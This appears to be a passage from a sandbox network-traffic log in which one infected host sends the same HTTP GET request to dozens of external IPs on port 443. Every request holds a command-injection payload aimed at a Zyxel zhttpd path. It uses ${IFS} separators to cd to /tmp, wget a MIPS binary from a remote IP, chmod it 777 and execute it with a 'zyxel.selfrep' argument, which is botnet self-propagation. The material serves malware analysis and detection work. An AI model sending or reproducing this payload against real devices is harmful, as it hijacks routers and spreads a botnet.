                                                        Feb 2, 2024 06:21:22.182940960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7461192.168.2.1448798145.244.191.44443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.182957888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7462192.168.2.1434140177.221.150.47443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.183017969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7463192.168.2.143526245.79.239.232443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.183058023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7464192.168.2.1447746196.221.61.173443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.183083057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7465192.168.2.1456594222.173.184.26443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.183116913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7466192.168.2.1457878114.4.54.221443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.183172941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7467192.168.2.1441014120.67.205.192443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.183203936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7468192.168.2.145814474.126.214.83443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.183259964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7469192.168.2.1440914116.93.88.134443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.183283091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7470192.168.2.145222824.78.12.206443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.183324099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7471192.168.2.1458118137.17.61.14443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.183362007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7472192.168.2.143645025.212.254.101443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.183408022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7473192.168.2.1435582119.97.203.173443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.183449984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7474192.168.2.1441518168.238.71.34443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.183490038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7475192.168.2.143624259.55.115.9443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.183521032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7476192.168.2.144742677.170.68.136443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.183568954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7477192.168.2.144505232.58.68.247443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.183624029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7478192.168.2.145918087.93.57.144443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.183657885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7479192.168.2.1444602152.140.25.30443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.183686018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7480192.168.2.1455944137.50.88.222443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.183715105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7481192.168.2.144240084.100.141.215443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.183754921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7482192.168.2.1453576161.227.71.33443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.183796883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7483192.168.2.1448252147.85.164.87443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.183824062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7484192.168.2.14338704.99.30.11443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.183861017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7485192.168.2.145191238.57.139.144443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.183917046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7486192.168.2.1452788105.230.20.44443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.183953047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7487192.168.2.1460356184.128.228.52443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.183996916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7488192.168.2.145996895.182.170.231443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.184022903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7489192.168.2.145116282.136.234.40443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.184067965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7490192.168.2.1438666193.255.196.55443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.184108019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7491192.168.2.144026258.157.175.76443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.184135914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7492192.168.2.145362441.200.148.144443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.184180975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7493192.168.2.146093472.46.171.138443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.184215069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7494192.168.2.1437902221.201.242.204443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.184243917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7495192.168.2.143797069.102.44.224443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.184288025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7496192.168.2.1442404136.161.123.230443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.184314013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7497192.168.2.1449324216.128.125.96443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.184357882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7498192.168.2.1451242144.108.38.136443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.184390068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7499192.168.2.1432802125.239.45.212443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.184446096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7500192.168.2.1460002222.119.87.139443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.184458971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7501192.168.2.1438692100.24.196.253443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.184480906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7502192.168.2.1449014210.18.32.152443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.184520006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7503192.168.2.146039873.146.209.73443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.184556007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7504192.168.2.1450096154.62.96.111443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.184592009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7505192.168.2.1433448222.102.9.99443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.184643030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7506192.168.2.1438600132.164.21.25443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.184675932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7507192.168.2.145262245.5.59.150443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.184719086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7508192.168.2.1448776168.20.20.86443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.184756994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7509192.168.2.1459382223.221.22.136443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.184808969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7510192.168.2.144857086.38.64.17443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.184842110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7511192.168.2.143873257.13.157.236443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.184880018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7512192.168.2.1440722128.184.235.235443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.184922934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7513192.168.2.1452588182.95.66.37443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.184952974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7514192.168.2.1451874147.179.34.32443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.184989929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7515192.168.2.144373895.5.242.48443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.185018063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7516192.168.2.1447776142.30.45.38443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.185049057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7517192.168.2.144666837.212.164.201443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.185087919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7518192.168.2.143432088.35.79.46443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.185120106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7519192.168.2.145395294.134.159.82443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.185153008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7520192.168.2.145769032.127.33.36443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.185189962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7521192.168.2.145127441.121.146.101443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.185220957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7522192.168.2.1443836161.243.80.217443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.185266018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7523192.168.2.14521345.121.246.75443
                                                        TimestampBytes transferredDirectionData
